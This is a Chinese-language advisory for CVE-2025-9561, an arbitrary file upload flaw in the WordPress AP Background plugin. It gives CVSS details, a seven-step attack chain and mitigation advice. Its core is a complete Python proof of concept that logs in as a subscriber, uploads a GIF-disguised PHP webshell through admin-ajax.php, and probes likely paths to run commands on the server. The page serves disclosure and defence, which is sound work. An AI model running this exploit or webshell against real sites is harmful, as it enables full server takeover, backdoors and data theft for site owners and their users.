CVE-2025-9561 WordPress AP Background插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-9561

漏洞类型

任意文件上传/远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress AP Background Plugin

漏洞概述

CVE-2025-9561是WordPress AP Background插件中存在的一个高危安全漏洞。该漏洞的CVSS 3.1评分为8.8分，属于高危级别。AP Background是一款用于在WordPress网站后台创建和管理视差背景效果的插件，广泛应用于各类WordPress站点中。该漏洞存在于插件的advParallaxBackAdminSaveSlider()处理函数中，由于缺少有效的身份授权验证机制以及对上传文件类型校验不充分，导致经过身份验证的攻击者（具有Subscriber级别及以上权限）能够向受影响的网站服务器上传任意类型的文件。攻击者可以利用此漏洞上传包含恶意代码的文件（如WebShell），从而实现远程代码执行（RCE），完全控制目标WordPress网站。该漏洞由Wordfence安全团队的安全研究员发现并报告，披露日期为2025年10月3日。由于利用该漏洞所需的权限级别较低（Subscriber级别），且无需用户交互配合，使得该漏洞的利用门槛相对较低，潜在威胁较大。受影响的版本范围为3.8.1至3.8.2，建议使用该插件的WordPress站点管理员尽快升级到修复版本以消除安全风险。

技术细节

该漏洞的核心问题在于AP Background插件中的advParallaxBackAdminSaveSlider()处理函数存在两个关键安全缺陷：

1. **授权验证缺失（Broken Access Control）**：该函数未对调用者的权限进行充分的验证检查。在WordPress中，正常的管理功能应当通过current_user_can()等函数验证用户是否具备相应的管理权限（如manage_options等）。然而advParallaxBackAdminSaveSlider()函数允许任何已登录的用户（包括最低权限的Subscriber角色）调用该功能，违反了最小权限原则。

2. **文件类型校验不充分（Insufficient File Validation）**：函数在处理文件上传时，未对上传文件的扩展名、MIME类型以及文件内容进行严格的白名单校验。攻击者可以绕过简单的扩展名校验，通过修改Content-Type或使用双扩展名等方式上传PHP等可执行脚本文件。

**利用方式**：
- 攻击者首先注册一个WordPress账号（Subscriber级别权限）
- 通过构造恶意的HTTP请求调用admin-ajax.php中的相关action，触发advParallaxBackAdminSaveSlider()函数
- 在请求中包含一个伪装为图片但实际包含PHP代码的恶意文件
- 由于缺少文件类型校验，文件被成功上传到服务器可访问目录
- 攻击者通过浏览器访问上传的PHP文件，即可执行任意代码

该漏洞的CVSS向量为：CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H，表明通过网络即可利用，攻击复杂度低，仅需低权限认证，无需用户交互，对机密性、完整性和可用性均产生高影响。

攻击链分析

STEP 1

步骤1：注册账号

攻击者访问目标WordPress站点，注册一个Subscriber级别的普通用户账号（如果站点允许开放注册），或通过其他方式获取低权限账号凭证。

STEP 2

步骤2：身份认证

使用获取的Subscriber级别账号登录WordPress站点，获取有效的会话Cookie和认证凭证。

STEP 3

步骤3：构造恶意文件

创建一个包含PHP WebShell代码的恶意文件，通过添加图片文件头（如GIF89a）伪装成图片文件，以绕过简单的文件类型校验。

STEP 4

步骤4：触发漏洞端点

通过构造HTTP POST请求调用admin-ajax.php中的advParallaxBackAdminSaveSlider action，将恶意文件作为参数上传。由于缺少授权验证，Subscriber级别用户可成功调用此管理功能。

STEP 5

步骤5：文件上传成功

由于文件类型校验不充分，恶意PHP文件被成功上传到服务器的可访问目录中。

STEP 6

步骤6：远程代码执行

攻击者通过浏览器访问上传的PHP文件URL，传入命令参数执行任意系统命令，完全控制目标服务器，实现远程代码执行（RCE）。

STEP 7

步骤7：权限提升与持久化

获取服务器控制权限后，攻击者可进一步提升权限至管理员、植入后门、窃取敏感数据或利用该服务器作为跳板攻击内网其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9561 - WordPress AP Background Plugin Arbitrary File Upload PoC
# Vulnerability: Missing authorization + Insufficient file validation in advParallaxBackAdminSaveSlider()
# Affected versions: 3.8.1 - 3.8.2

import requests
import re

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "subscriber_password"

# Step 1: Login as Subscriber-level user
session = requests.Session()

# Get login page to retrieve nonce/token
login_page = session.get(f"{TARGET_URL}/wp-login.php")

# Perform login
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
response = session.post(f"{TARGET_URL}/wp-login.php", data=login_data)

# Verify login success
if "wp-admin" in response.url or "dashboard" in response.text.lower():
    print("[+] Successfully logged in as Subscriber")
else:
    print("[-] Login failed")
    exit(1)

# Step 2: Prepare malicious PHP webshell disguised as image
# PHP payload - minimal webshell
php_payload = b"<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>"

# GIF89a header to bypass MIME type checks
gif_header = b"GIF89a"
malicious_file = gif_header + php_payload

# Step 3: Upload malicious file via vulnerable advParallaxBackAdminSaveSlider handler
# The handler is typically triggered via WordPress admin-ajax.php
files = {
    "slider_image": ("shell.php", malicious_file, "image/gif")
}

data = {
    "action": "advParallaxBackAdminSaveSlider",  # Vulnerable AJAX action
    "slider_title": "exploit_slider"
}

# Send the exploit request
upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
response = session.post(upload_url, files=files, data=data)

print(f"[+] Upload response: {response.text}")

# Step 4: Try to locate uploaded file and execute command
# Common upload paths in AP Background plugin
upload_paths = [
    "/wp-content/uploads/ap-background/sliders/shell.php",
    "/wp-content/uploads/shell.php",
    "/wp-content/plugins/ap-background/uploads/shell.php"
]

for path in upload_paths:
    rce_url = f"{TARGET_URL}{path}?cmd=id"
    rce_response = session.get(rce_url)
    if rce_response.status_code == 200 and "uid=" in rce_response.text:
        print(f"[+] RCE confirmed at: {rce_url}")
        print(f"[+] Output: {rce_response.text}")
        break
    else:
        print(f"[-] Tried {path} - checking response")

影响范围

WordPress AP Background Plugin 3.8.1

WordPress AP Background Plugin 3.8.2

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）通过WordPress后台暂时停用AP Background插件；2）在Web服务器层面禁用uploads目录的PHP脚本执行权限（在Nginx配置中添加location ~ \.php$ { deny all; }，或在Apache的uploads目录.htaccess中添加php_flag engine off）；3）部署WAF规则拦截针对advParallaxBackAdminSaveSlider action的可疑请求；4）限制WordPress用户注册功能，避免低权限账号被恶意利用；5）密切监控服务器日志和文件变更，及时发现异常行为。